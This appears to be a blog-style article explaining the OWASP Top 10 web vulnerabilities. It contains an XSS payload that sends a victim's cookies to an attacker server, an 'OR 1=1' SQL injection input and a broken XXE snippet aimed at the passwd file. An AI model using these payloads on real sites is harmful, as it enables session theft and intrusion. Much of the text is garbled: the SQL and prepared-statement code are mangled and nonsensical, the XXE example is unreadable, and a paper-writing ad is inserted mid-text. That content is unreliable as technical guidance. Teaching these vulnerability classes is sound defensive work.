OWASP Top 10 Security Vulnerabilities: Real-World examples

The OWASP Top 10 Security Guideline is a set of security guidelines that are followed by security professionals and developers across all industries. The OWASP (Open Web Application Security Project) is a non profit organization that was started in 2004 with the goal of helping secure applications from popular vulnerabilities.

Software development techniques have changed over time, and so has the nature of the attacks. OWASP is constantly updating their vulnerabilities list based off of the current security trends.

Also, as a student who is reading this article and doesn't have enough time on exploring OWASP vulnerabilities simply can appeal to writing experts from experts like MyPaperWriter (https://mypaperwriter.com/purchase-research-papers.htm)

We'll now examine each of the Top Ten Standards with real-world examples.

1. Injection

SQL infiltrations can occur when the SQL statement is dynamically augmented with a user controlled input without validating input. This is when the attacker will provide malicious information and modify the SQL statement to accomplish their malicious goals. It can be exploited by an attacker to obtain sensitive information, remove data, and so on. These are examples both of vulnerable and unvulnerable code.

Vulnerable code:

uName = getRequestString("username"); uPass = getRequestString("userpassword"); SQL = 'SELECT* FROM Users WHERE Username = (uName + Pass + '") AND Pass = (uPass + uPass)'

Here uName & uPass can be controlled by the user. SQL statements will look something like this if the attacker has entered uName = "admin", and uPass = "OR 1=1"

sql= 'SELECT* FROM Users IF Name = admin AND Pass = or 1 = 1, OR 0 = 0.

This makes the statement true. Records will now be fetched for administrators. This issue can be resolved by using prepared statement, which is shown below.

Fixed:

String Uname = //user input String Upass = //user input Connection connection = DriverManager.getConnection(...); PreparedStatement statement = connection.prepareStatement( If you want to select users, then "SELECT * from Users where Name = Pass AND Pass is?". "SELECT * From Users WHERE Username =? statement.setString(1, Uname); statement.setString(2, Pass); ResultSet rs = statement.executeQuery();

2. Broken Authentication

Insufficient or weak authentication may allow an attacker to gain access by compromising passwords and session tokens. To prevent easy guessing, application developers must use secure and random passwords.

In addition, security controls like account lockout and password expiration should exist to stop applications falling victim to automated bruteforce attacks.

3. The Exposure of Sensitive Data

The two most common ways that data can be exposed are: First,at-rest--when data is saved in the system or stored as a database (file), they need to be encrypted. This is important because if you don't do it and your storage service gets compromised, the stored data could be exposed.

Second During transit, all data sent through network channels should be properly encoded. In this way, even if they are intercepted somewhere in the middle, sensitive data will remain intact. In transit data security is the term used.

Note: Hashing password fields and storing them in the databases is a good idea. Hashing works in a single-direction. So, even if a database is compromised by an attacker, they will be unable to get the password value out of the hash.

4. XML External Entities

Several applications use XML document to allow data transfer between the browser and the server. XML processors are required to read the information. In the event that a malignant input XML is parsed by a poorly-configured XML parser, it could evaluate external entity referenced in the document and execute the attacker's command. The following is an XML file that contains malicious code.

Document Type Foo ]> <foo>&xxefoo>

There is a "read" command in the snippet above that will read the "passwd' file local to the server. In some cases, the vulnerability might be propagated into other attacks. For example, SSRF is a server-side request forgery, and local files can also contain remote code.

In order to fix the issue, we suggest disabling resolution for external entities as well as XInclude.

5. Broken Access Control

Access control means restricting certain resources for only the intended users. Uncontrolled access by an application can give attackers access to data and functionalities that are not intended. This is a live example of an application that relied on input from users without validating it.

System #1: In a SQL query, the application accesses account information by using data that has not been validated.

pstmt.setString(1, request.getParameter("acctNo")); ResultSet results = Pstmt.executeQuery() In order to gain access, an attacker can modify the 'acctNo’ parameter of the web browser in such a way that it sends whatever account number the attacker wants.

Service call : http://example.com/app/accountInfo?acct=1234

6. Security Misconfiguration

This is the most popular security vulnerability across many applications/systems. Many developers tend to use the standard settings provided by integrated tools and systems during application development. These defaults are dangerous and leave your application susceptible.

Under normal circumstances, application configurations enable detailed error messages. Browsers provide the details when an issue occurs. Unluckily, sensitive information like component versions can be exposed.

7. Cross-Site Scripting XSS

When cross-site scripting occurs ( XSS), the attacker adds user input to a web page, without validating or properly escaping. Using malicious code, an attacker could then execute Javascript directly on the victim’s browser. This could be used to redirect a user to an attacker controlled page, deface the page with UI elements, or steal information about cookies. The example below shows a javascript that sends cookie details to an attacker server.

<script type="text/javascript">document.location="http://192.168.0.48:5000/?c="+document.cookie;script>

8. Insecure Deserialization:

The insecure deserialization vulnerabilities arise when an application dererializes the serialized data provided by a user, without using security controls. Some popular deserializers like Java's ReadObject or Python's Pickle Module are vulnerable to de-serialization. An attacker can use this technique to secure remote access by performing remote code execution.

9. Components with Vulnerabilities are Not to be Used

It's common for application developers to use open source and free softwares. It's equally as important to secure these third-party and open-source components. This is known also as analysis of software composition.

10. Insufficient Logging & Monitoring

In order to both prevent and react in case of a cyberattack, the log and monitoring system is the key link in the Security Event Management chain. They can detect the source and cause of the attacks. Splunk, CyberArk and other incident monitoring solutions help analyse endpoint logs in order to detect malicious activity. Resilient ForcePoint Crowdstike, Resilient and CyberArk are all incident response systems that can act on alarms. To combat security risks, they execute a series of predefined steps.

It is important that application developers, security engineers and other professionals test the code base against web vulnerabilities. This should be done before releasing applications to production. This OWASP top 10 list can be used to test security.

It was a pleasure to share the OWASP Top 10 list with you. I hope you enjoyed reading.